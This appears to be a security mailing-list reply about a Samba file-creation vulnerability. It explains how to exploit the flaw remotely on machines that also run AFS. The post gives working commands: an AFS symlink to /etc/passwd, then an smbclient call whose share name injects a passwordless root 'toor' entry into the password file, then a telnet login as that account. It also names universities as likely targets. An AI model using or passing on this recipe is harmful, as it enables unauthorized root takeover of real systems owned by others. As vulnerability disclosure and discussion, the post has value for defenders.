Re: smbd remote file creation vulnerability

[Christopher William Palow <cwp () andrew cmu edu>]

I was hoping to test this out but haven't been able to so here goes on
theoretical...  

How to make this exploit a remote one using AFS or other remote file
systems.

What does this exploit need on the remote side??  A
symlink; soo... on a AFS system ,preferably one of a well known node that
most AFS servers would have in their CellServDB such as
andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named 
x.log like

ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log

now make the symlink world readable... then all you need is UNIXes running
samba in the vulnerable configuration and running AFS.

smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ 
 -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor

if root logins aren't allowed make a dummy account first, login with that
then make a toor account ontop of that and su over to toor.


what machines does this really effect?  Those running samba and AFS,
mainly educational institutions or other large institutions.


Christopher Palow
palow () cmu edu
Senior Electrical and Computer Engineering
Carnegie Mellon University